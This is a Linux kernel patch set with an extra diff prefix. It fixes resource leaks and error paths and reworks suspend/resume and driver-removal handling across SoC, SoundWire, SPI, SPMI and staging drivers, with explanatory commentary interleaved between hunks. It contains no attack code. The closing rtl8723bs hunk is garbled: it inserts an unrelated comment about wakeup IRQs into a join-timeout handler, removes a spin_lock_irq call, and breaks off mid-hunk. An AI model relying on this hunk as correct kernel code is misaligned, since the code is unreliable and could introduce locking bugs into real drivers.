+diff --git a/drivers/soc/bcm/brcmstb/biuctrl.c b/drivers/soc/bcm/brcmstb/biuctrl.c
+index e1d7b45432485..364ddbe365c24 100644
+--- a/drivers/soc/bcm/brcmstb/biuctrl.c
++++ b/drivers/soc/bcm/brcmstb/biuctrl.c
+@@ -288,6 +288,10 @@ static int __init setup_hifcpubiuctrl_regs(struct device_node *np)
+ 	if (BRCM_ID(family_id) == 0x7260 && BRCM_REV(family_id) == 0)
+ 		cpubiuctrl_regs = b53_cpubiuctrl_no_wb_regs;
+ out:
++	if (ret && cpubiuctrl_base) {
++		iounmap(cpubiuctrl_base);
++		cpubiuctrl_base = NULL;
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/renesas/renesas-soc.c b/drivers/soc/renesas/renesas-soc.c
+index 621ceaa047d47..057b85b158f99 100644
+--- a/drivers/soc/renesas/renesas-soc.c
++++ b/drivers/soc/renesas/renesas-soc.c
+@@ -454,8 +454,11 @@ static int __init renesas_soc_init(void)
+ 	}
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+-	if (!soc_dev_attr)
++	if (!soc_dev_attr) {
++		if (chipid)
++			iounmap(chipid);
+ 		return -ENOMEM;
++	}
+ 
+ 	np = of_find_node_by_path("/");
+ 	of_property_read_string(np, "model", &soc_dev_attr->machine);
+diff --git a/drivers/soc/ti/pm33xx.c b/drivers/soc/ti/pm33xx.c
+index ce09c42eaed25..f04c21157904b 100644
+--- a/drivers/soc/ti/pm33xx.c
++++ b/drivers/soc/ti/pm33xx.c
+@@ -527,7 +527,7 @@ static int am33xx_pm_probe(struct platform_device *pdev)
+ 
+ 	ret = am33xx_pm_alloc_sram();
+ 	if (ret)
+-		return ret;
++		goto err_wkup_m3_ipc_put;
+ 
+ 	ret = am33xx_pm_rtc_setup();
+ 	if (ret)
+@@ -572,13 +572,14 @@ err_pm_runtime_put:
+ 	pm_runtime_put_sync(dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(dev);
+-	wkup_m3_ipc_put(m3_ipc);
+ err_unsetup_rtc:
+ 	iounmap(rtc_base_virt);
+ 	clk_put(rtc_fck);
+ err_free_sram:
+ 	am33xx_pm_free_sram();
+ 	pm33xx_dev = NULL;
++err_wkup_m3_ipc_put:
++	wkup_m3_ipc_put(m3_ipc);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index e7da7d7b213fb..7286c9b3be691 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -1719,40 +1719,40 @@ int cdns_set_sdw_stream(struct snd_soc_dai *dai,
+ 			void *stream, int direction)
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 
+ 	if (stream) {
+ 		/* first paranoia check */
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-			dma = dai->playback_dma_data;
++			dai_runtime = dai->playback_dma_data;
+ 		else
+-			dma = dai->capture_dma_data;
++			dai_runtime = dai->capture_dma_data;
+ 
+-		if (dma) {
++		if (dai_runtime) {
+ 			dev_err(dai->dev,
+-				"dma_data already allocated for dai %s\n",
++				"dai_runtime already allocated for dai %s\n",
+ 				dai->name);
+ 			return -EINVAL;
+ 		}
+ 
+-		/* allocate and set dma info */
+-		dma = kzalloc(sizeof(*dma), GFP_KERNEL);
+-		if (!dma)
++		/* allocate and set dai_runtime info */
++		dai_runtime = kzalloc(sizeof(*dai_runtime), GFP_KERNEL);
++		if (!dai_runtime)
+ 			return -ENOMEM;
+ 
+-		dma->stream_type = SDW_STREAM_PCM;
++		dai_runtime->stream_type = SDW_STREAM_PCM;
+ 
+-		dma->bus = &cdns->bus;
+-		dma->link_id = cdns->instance;
++		dai_runtime->bus = &cdns->bus;
++		dai_runtime->link_id = cdns->instance;
+ 
+-		dma->stream = stream;
++		dai_runtime->stream = stream;
+ 
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-			dai->playback_dma_data = dma;
++			dai->playback_dma_data = dai_runtime;
+ 		else
+-			dai->capture_dma_data = dma;
++			dai->capture_dma_data = dai_runtime;
+ 	} else {
+-		/* for NULL stream we release allocated dma_data */
++		/* for NULL stream we release allocated dai_runtime */
+ 		if (direction == SNDRV_PCM_STREAM_PLAYBACK) {
+ 			kfree(dai->playback_dma_data);
+ 			dai->playback_dma_data = NULL;
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index 51e6ecc027cbc..fea3a90550d37 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -76,7 +76,7 @@ struct sdw_cdns_stream_config {
+ };
+ 
+ /**
+- * struct sdw_cdns_dma_data: Cadence DMA data
++ * struct sdw_cdns_dai_runtime: Cadence DAI runtime data
+  *
+  * @name: SoundWire stream name
+  * @stream: stream runtime
+@@ -84,18 +84,16 @@ struct sdw_cdns_stream_config {
+  * @bus: Bus handle
+  * @stream_type: Stream type
+  * @link_id: Master link id
+- * @hw_params: hw_params to be applied in .prepare step
+  * @suspended: status set when suspended, to be used in .prepare
+  * @paused: status set in .trigger, to be used in suspend
+  */
+-struct sdw_cdns_dma_data {
++struct sdw_cdns_dai_runtime {
+ 	char *name;
+ 	struct sdw_stream_runtime *stream;
+ 	struct sdw_cdns_pdi *pdi;
+ 	struct sdw_bus *bus;
+ 	enum sdw_stream_type stream_type;
+ 	int link_id;
+-	struct snd_pcm_hw_params *hw_params;
+ 	bool suspended;
+ 	bool paused;
+ };
+diff --git a/drivers/soundwire/intel.c b/drivers/soundwire/intel.c
+index 8c76541d553f1..89f8cab3f5141 100644
+--- a/drivers/soundwire/intel.c
++++ b/drivers/soundwire/intel.c
+@@ -824,15 +824,15 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	struct sdw_cdns_pdi *pdi;
+ 	struct sdw_stream_config sconfig;
+ 	struct sdw_port_config *pconfig;
+ 	int ch, dir;
+ 	int ret;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma)
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime)
+ 		return -EIO;
+ 
+ 	ch = params_channels(params);
+@@ -854,10 +854,9 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	sdw_cdns_config_stream(cdns, ch, dir, pdi);
+ 
+ 	/* store pdi and hw_params, may be needed in prepare step */
+-	dma->paused = false;
+-	dma->suspended = false;
+-	dma->pdi = pdi;
+-	dma->hw_params = params;
++	dai_runtime->paused = false;
++	dai_runtime->suspended = false;
++	dai_runtime->pdi = pdi;
+ 
+ 	/* Inform DSP about PDI stream number */
+ 	ret = intel_params_stream(sdw, substream->stream, dai, params,
+@@ -869,7 +868,7 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	sconfig.direction = dir;
+ 	sconfig.ch_count = ch;
+ 	sconfig.frame_rate = params_rate(params);
+-	sconfig.type = dma->stream_type;
++	sconfig.type = dai_runtime->stream_type;
+ 
+ 	sconfig.bps = snd_pcm_format_width(params_format(params));
+ 
+@@ -884,7 +883,7 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	pconfig->ch_mask = (1 << ch) - 1;
+ 
+ 	ret = sdw_stream_add_master(&cdns->bus, &sconfig,
+-				    pconfig, 1, dma->stream);
++				    pconfig, 1, dai_runtime->stream);
+ 	if (ret)
+ 		dev_err(cdns->dev, "add master to stream failed:%d\n", ret);
+ 
+@@ -898,19 +897,24 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ch, dir;
+ 	int ret = 0;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma) {
+-		dev_err(dai->dev, "failed to get dma data in %s\n",
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime) {
++		dev_err(dai->dev, "failed to get dai runtime in %s\n",
+ 			__func__);
+ 		return -EIO;
+ 	}
+ 
+-	if (dma->suspended) {
+-		dma->suspended = false;
++	if (dai_runtime->suspended) {
++		struct snd_soc_pcm_runtime *rtd = asoc_substream_to_rtd(substream);
++		struct snd_pcm_hw_params *hw_params;
++
++		hw_params = &rtd->dpcm[substream->stream].hw_params;
++
++		dai_runtime->suspended = false;
+ 
+ 		/*
+ 		 * .prepare() is called after system resume, where we
+@@ -921,21 +925,21 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 		 */
+ 
+ 		/* configure stream */
+-		ch = params_channels(dma->hw_params);
++		ch = params_channels(hw_params);
+ 		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 			dir = SDW_DATA_DIR_RX;
+ 		else
+ 			dir = SDW_DATA_DIR_TX;
+ 
+-		intel_pdi_shim_configure(sdw, dma->pdi);
+-		intel_pdi_alh_configure(sdw, dma->pdi);
+-		sdw_cdns_config_stream(cdns, ch, dir, dma->pdi);
++		intel_pdi_shim_configure(sdw, dai_runtime->pdi);
++		intel_pdi_alh_configure(sdw, dai_runtime->pdi);
++		sdw_cdns_config_stream(cdns, ch, dir, dai_runtime->pdi);
+ 
+ 		/* Inform DSP about PDI stream number */
+ 		ret = intel_params_stream(sdw, substream->stream, dai,
+-					  dma->hw_params,
++					  hw_params,
+ 					  sdw->instance,
+-					  dma->pdi->intel_alh_id);
++					  dai_runtime->pdi->intel_alh_id);
+ 	}
+ 
+ 	return ret;
+@@ -946,11 +950,11 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ {
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ret;
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma)
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime)
+ 		return -EIO;
+ 
+ 	/*
+@@ -959,10 +963,10 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 	 * DEPREPARED for the first cpu-dai and to RELEASED for the last
+ 	 * cpu-dai.
+ 	 */
+-	ret = sdw_stream_remove_master(&cdns->bus, dma->stream);
++	ret = sdw_stream_remove_master(&cdns->bus, dai_runtime->stream);
+ 	if (ret < 0) {
+ 		dev_err(dai->dev, "remove master from stream %s failed: %d\n",
+-			dma->stream->name, ret);
++			dai_runtime->stream->name, ret);
+ 		return ret;
+ 	}
+ 
+@@ -972,8 +976,7 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 		return ret;
+ 	}
+ 
+-	dma->hw_params = NULL;
+-	dma->pdi = NULL;
++	dai_runtime->pdi = NULL;
+ 
+ 	return 0;
+ }
+@@ -996,17 +999,17 @@ static int intel_pcm_set_sdw_stream(struct snd_soc_dai *dai,
+ static void *intel_get_sdw_stream(struct snd_soc_dai *dai,
+ 				  int direction)
+ {
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 
+ 	if (direction == SNDRV_PCM_STREAM_PLAYBACK)
+-		dma = dai->playback_dma_data;
++		dai_runtime = dai->playback_dma_data;
+ 	else
+-		dma = dai->capture_dma_data;
++		dai_runtime = dai->capture_dma_data;
+ 
+-	if (!dma)
++	if (!dai_runtime)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	return dma->stream;
++	return dai_runtime->stream;
+ }
+ 
+ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct snd_soc_dai *dai)
+@@ -1014,7 +1017,7 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 	struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 	struct sdw_intel *sdw = cdns_to_intel(cdns);
+ 	struct sdw_intel_link_res *res = sdw->link_res;
+-	struct sdw_cdns_dma_data *dma;
++	struct sdw_cdns_dai_runtime *dai_runtime;
+ 	int ret = 0;
+ 
+ 	/*
+@@ -1025,9 +1028,9 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 	if (res->ops && res->ops->trigger)
+ 		res->ops->trigger(dai, cmd, substream->stream);
+ 
+-	dma = snd_soc_dai_get_dma_data(dai, substream);
+-	if (!dma) {
+-		dev_err(dai->dev, "failed to get dma data in %s\n",
++	dai_runtime = snd_soc_dai_get_dma_data(dai, substream);
++	if (!dai_runtime) {
++		dev_err(dai->dev, "failed to get dai runtime in %s\n",
+ 			__func__);
+ 		return -EIO;
+ 	}
+@@ -1042,17 +1045,17 @@ static int intel_trigger(struct snd_pcm_substream *substream, int cmd, struct sn
+ 		 * the .trigger callback is used to track the suspend case only.
+ 		 */
+ 
+-		dma->suspended = true;
++		dai_runtime->suspended = true;
+ 
+ 		ret = intel_free_stream(sdw, substream->stream, dai, sdw->instance);
+ 		break;
+ 
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		dma->paused = true;
++		dai_runtime->paused = true;
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		dma->paused = false;
++		dai_runtime->paused = false;
+ 		break;
+ 	default:
+ 		break;
+@@ -1091,25 +1094,25 @@ static int intel_component_dais_suspend(struct snd_soc_component *component)
+ 	for_each_component_dais(component, dai) {
+ 		struct sdw_cdns *cdns = snd_soc_dai_get_drvdata(dai);
+ 		struct sdw_intel *sdw = cdns_to_intel(cdns);
+-		struct sdw_cdns_dma_data *dma;
++		struct sdw_cdns_dai_runtime *dai_runtime;
+ 		int stream;
+ 		int ret;
+ 
+-		dma = dai->playback_dma_data;
++		dai_runtime = dai->playback_dma_data;
+ 		stream = SNDRV_PCM_STREAM_PLAYBACK;
+-		if (!dma) {
+-			dma = dai->capture_dma_data;
++		if (!dai_runtime) {
++			dai_runtime = dai->capture_dma_data;
+ 			stream = SNDRV_PCM_STREAM_CAPTURE;
+ 		}
+ 
+-		if (!dma)
++		if (!dai_runtime)
+ 			continue;
+ 
+-		if (dma->suspended)
++		if (dai_runtime->suspended)
+ 			continue;
+ 
+-		if (dma->paused) {
+-			dma->suspended = true;
++		if (dai_runtime->paused) {
++			dai_runtime->suspended = true;
+ 
+ 			ret = intel_free_stream(sdw, stream, dai, sdw->instance);
+ 			if (ret < 0)
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index cee2b22231410..866026185c669 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -696,7 +696,7 @@ static int qcom_swrm_init(struct qcom_swrm_ctrl *ctrl)
+ 
+ 	ctrl->reg_write(ctrl, SWRM_MCP_BUS_CTRL, SWRM_MCP_BUS_CLK_START);
+ 	/* Configure number of retries of a read/write cmd */
+-	if (ctrl->version > 0x01050001) {
++	if (ctrl->version >= 0x01050001) {
+ 		/* Only for versions >= 1.5.1 */
+ 		ctrl->reg_write(ctrl, SWRM_CMD_FIFO_CFG_ADDR,
+ 				SWRM_RD_WR_CMD_RETRIES |
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 976a217e356d5..7e05b48dbd71c 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -672,18 +672,28 @@ static int atmel_qspi_remove(struct platform_device *pdev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
+-
+ 	spi_unregister_controller(ctrl);
+-	atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++
++	ret = pm_runtime_get_sync(&pdev->dev);
++	if (ret >= 0) {
++		atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++		clk_disable(aq->qspick);
++		clk_disable(aq->pclk);
++	} else {
++		/*
++		 * atmel_qspi_runtime_{suspend,resume} just disable and enable
++		 * the two clks respectively. So after resume failed these are
++		 * off, and we skip hardware access and disabling these clks again.
++		 */
++		dev_warn(&pdev->dev, "Failed to resume device on remove\n");
++	}
++
++	clk_unprepare(aq->qspick);
++	clk_unprepare(aq->pclk);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	clk_disable_unprepare(aq->qspick);
+-	clk_disable_unprepare(aq->pclk);
+ 	return 0;
+ }
+ 
+@@ -752,7 +762,11 @@ static int __maybe_unused atmel_qspi_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	return clk_enable(aq->qspick);
++	ret = clk_enable(aq->qspick);
++	if (ret)
++		clk_disable(aq->pclk);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops __maybe_unused atmel_qspi_pm_ops = {
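
A recurring theme in the SPI hunks here (atmel-quadspi above, spi-imx and spi-qup below): a platform driver's .remove() must not bail out early just because runtime resume failed, since the device is going away regardless and an early return leaks clocks and DMA channels and leaves runtime-PM counters unbalanced. The pattern is to use pm_runtime_get_sync(), touch the hardware only when the resume actually worked, and run the rest of the teardown unconditionally (sketch; CTRL_REG is illustrative):

        ret = pm_runtime_get_sync(&pdev->dev);
        if (ret >= 0) {
                /* powered: quiesce the controller */
                writel(0, base + CTRL_REG);
        } else {
                dev_warn(&pdev->dev, "resume failed, skipping hw disable\n");
        }
        /* resource teardown happens either way */
        pm_runtime_disable(&pdev->dev);
        pm_runtime_put_noidle(&pdev->dev);
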
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 4472305479452..30fd4bc90580e 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1763,32 +1763,36 @@ static int cqspi_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int cqspi_suspend(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
++	int ret;
+ 
++	ret = spi_master_suspend(master);
+ 	cqspi_controller_enable(cqspi, 0);
+-	return 0;
++
++	clk_disable_unprepare(cqspi->clk);
++
++	return ret;
+ }
+ 
+ static int cqspi_resume(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
+ 
+-	cqspi_controller_enable(cqspi, 1);
+-	return 0;
+-}
++	clk_prepare_enable(cqspi->clk);
++	cqspi_wait_idle(cqspi);
++	cqspi_controller_init(cqspi);
+ 
+-static const struct dev_pm_ops cqspi__dev_pm_ops = {
+-	.suspend = cqspi_suspend,
+-	.resume = cqspi_resume,
+-};
++	cqspi->current_cs = -1;
++	cqspi->sclk = 0;
++
++	return spi_master_resume(master);
++}
+ 
+-#define CQSPI_DEV_PM_OPS	(&cqspi__dev_pm_ops)
+-#else
+-#define CQSPI_DEV_PM_OPS	NULL
+-#endif
++static DEFINE_SIMPLE_DEV_PM_OPS(cqspi_dev_pm_ops, cqspi_suspend, cqspi_resume);
+ 
+ static const struct cqspi_driver_platdata cdns_qspi = {
+ 	.quirks = CQSPI_DISABLE_DAC_MODE,
+@@ -1855,7 +1859,7 @@ static struct platform_driver cqspi_platform_driver = {
+ 	.remove = cqspi_remove,
+ 	.driver = {
+ 		.name = CQSPI_NAME,
+-		.pm = CQSPI_DEV_PM_OPS,
++		.pm = &cqspi_dev_pm_ops,
+ 		.of_match_table = cqspi_dt_ids,
+ 	},
+ };
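
The cadence-quadspi hunk also modernizes the PM plumbing: DEFINE_SIMPLE_DEV_PM_OPS() unconditionally defines the dev_pm_ops object and references the callbacks through pm_sleep_ptr()-style constant conditions, so the old #ifdef CONFIG_PM_SLEEP scaffolding and the CQSPI_DEV_PM_OPS-as-NULL fallback disappear while the compiler still discards the callbacks in !PM_SLEEP builds. Typical usage (many drivers additionally wrap the reference in pm_sleep_ptr(); this one takes the address directly, as above):

        static DEFINE_SIMPLE_DEV_PM_OPS(foo_pm_ops, foo_suspend, foo_resume);

        static struct platform_driver foo_driver = {
                .driver = {
                        .name = "foo",
                        .pm   = pm_sleep_ptr(&foo_pm_ops),
                },
        };

The substantive part of the change makes suspend/resume real: suspend now quiesces the SPI core via spi_master_suspend() and gates the clock, while resume re-enables the clock, reinitializes the controller, and invalidates the cached chip-select and clock state (current_cs = -1, sclk = 0) so the first transfer reprograms the hardware.
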
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 93152144fd2ec..5602f052b2b50 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -181,8 +181,8 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 				struct spi_device *spi,
+ 				int bits_per_word)
+ {
+-	/* QE uses Little Endian for words > 8
+-	 * so transform all words > 8 into 8 bits
++	/* CPM/QE uses Little Endian for words > 8
++	 * so transform 16 and 32 bit words into 8 bits
+ 	 * Unfortunately that doesn't work for LSB so
+ 	 * reject these for now */
+ 	/* Note: 32 bits word, LSB works iff
+@@ -190,9 +190,11 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	if (spi->mode & SPI_LSB_FIRST &&
+ 	    bits_per_word > 8)
+ 		return -EINVAL;
+-	if (bits_per_word > 8)
++	if (bits_per_word <= 8)
++		return bits_per_word;
++	if (bits_per_word == 16 || bits_per_word == 32)
+ 		return 8; /* pretend it's 8 bits */
+-	return bits_per_word;
++	return -EINVAL;
+ }
+ 
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+@@ -222,7 +224,7 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else if (mpc8xxx_spi->flags & SPI_QE)
++	else
+ 		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+ 							  bits_per_word);
+ 
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index d209930069cf3..fbd7b354dd36b 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1864,13 +1864,11 @@ static int spi_imx_remove(struct platform_device *pdev)
+ 
+ 	spi_unregister_controller(controller);
+ 
+-	ret = pm_runtime_resume_and_get(spi_imx->dev);
+-	if (ret < 0) {
+-		dev_err(spi_imx->dev, "failed to enable clock\n");
+-		return ret;
+-	}
+-
+-	writel(0, spi_imx->base + MXC_CSPICTRL);
++	ret = pm_runtime_get_sync(spi_imx->dev);
++	if (ret >= 0)
++		writel(0, spi_imx->base + MXC_CSPICTRL);
++	else
++		dev_warn(spi_imx->dev, "failed to enable clock, skip hw disable\n");
+ 
+ 	pm_runtime_dont_use_autosuspend(spi_imx->dev);
+ 	pm_runtime_put_sync(spi_imx->dev);
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 678dc51ef0174..205e54f157b4a 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1277,18 +1277,22 @@ static int spi_qup_remove(struct platform_device *pdev)
+ 	struct spi_qup *controller = spi_master_get_devdata(master);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 
+-	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+-	if (ret)
+-		return ret;
++	if (ret >= 0) {
++		ret = spi_qup_set_state(controller, QUP_STATE_RESET);
++		if (ret)
++			dev_warn(&pdev->dev, "failed to reset controller (%pe)\n",
++				 ERR_PTR(ret));
+ 
+-	spi_qup_release_dma(master);
++		clk_disable_unprepare(controller->cclk);
++		clk_disable_unprepare(controller->iclk);
++	} else {
++		dev_warn(&pdev->dev, "failed to resume, skip hw disable (%pe)\n",
++			 ERR_PTR(ret));
++	}
+ 
+-	clk_disable_unprepare(controller->cclk);
+-	clk_disable_unprepare(controller->iclk);
++	spi_qup_release_dma(master);
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c
+index 55381592bb5a6..e73d3017863cb 100644
+--- a/drivers/spmi/spmi.c
++++ b/drivers/spmi/spmi.c
+@@ -350,7 +350,8 @@ static void spmi_drv_remove(struct device *dev)
+ 	const struct spmi_driver *sdrv = to_spmi_driver(dev->driver);
+ 
+ 	pm_runtime_get_sync(dev);
+-	sdrv->remove(to_spmi_device(dev));
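++	/* ->remove is optional; some SPMI drivers have nothing to tear down. */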
++	if (sdrv->remove)
++		sdrv->remove(to_spmi_device(dev));
+ 	pm_runtime_put_noidle(dev);
+ 
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index e4cf42438487d..636c45b128438 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -101,7 +101,7 @@ struct ad2s1210_state {
+ static const int ad2s1210_mode_vals[4][2] = {
+ 	[MOD_POS] = { 0, 0 },
+ 	[MOD_VEL] = { 0, 1 },
+-	[MOD_CONFIG] = { 1, 0 },
++	[MOD_CONFIG] = { 1, 1 },
+ };
+ 
+ static inline void ad2s1210_set_mode(enum ad2s1210_mode mode,
+diff --git a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+index 0bf513c26b6b5..a5c5bebad3061 100644
+--- a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
++++ b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+@@ -823,10 +823,10 @@ static int write_ts_to_decoder(struct av7110 *av7110, int type, const u8 *buf, s
+ 		av7110_ipack_flush(ipack);
+ 
+ 	if (buf[3] & ADAPT_FIELD) {
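++		/*
++		 * buf[4] is the adaptation_field_length; reject packets whose
++		 * adaptation field would run past the end of the buffer.
++		 */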
++		if (buf[4] > len - 1 - 4)
++			return 0;
+ 		len -= buf[4] + 1;
+ 		buf += buf[4] + 1;
+-		if (!len)
+-			return 0;
+ 	}
+ 
+ 	av7110_ipack_instant_repack(buf + 4, len - 4, ipack);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 7bab7586918c1..82806f198074a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -1066,6 +1066,8 @@ static int rkvdec_remove(struct platform_device *pdev)
+ {
+ 	struct rkvdec_dev *rkvdec = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&rkvdec->watchdog_work);
++
+ 	rkvdec_v4l2_cleanup(rkvdec);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.c b/drivers/staging/media/sunxi/cedrus/cedrus.c
+index 55c54dfdc585c..d2419319afd72 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.c
+@@ -541,6 +541,7 @@ static int cedrus_remove(struct platform_device *pdev)
+ {
+ 	struct cedrus_dev *dev = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&dev->watchdog_work);
+ 	if (media_devnode_is_registered(dev->mdev.devnode)) {
+ 		media_device_unregister(&dev->mdev);
+ 		v4l2_m2m_unregister_media_controller(dev->m2m_dev);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index 89bc989cffbae..c1e50084172d8 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -717,6 +717,7 @@ static int _rtl92e_sta_up(struct net_device *dev, bool is_silent_reset)
+ 	else
+ 		netif_wake_queue(dev);
+ 
++	priv->bfirst_after_down = false;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/rtl8723bs/core/rtw_mlme.c b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+index 6498fd17e1d3e..8159bb651c445 100644
+--- a/drivers/staging/rtl8723bs/core/rtw_mlme.c
++++ b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+@@ -1549,7 +1549,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
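++		/*
++		 * RX data arriving on a wakeup-armed IRQ counts as a wakeup
++		 * event, letting the PM core abort an in-progress suspend.
++		 */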
+ 	if (adapter->bDriverStopped || adapter->bSurpriseRemoved)
+ 		return;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
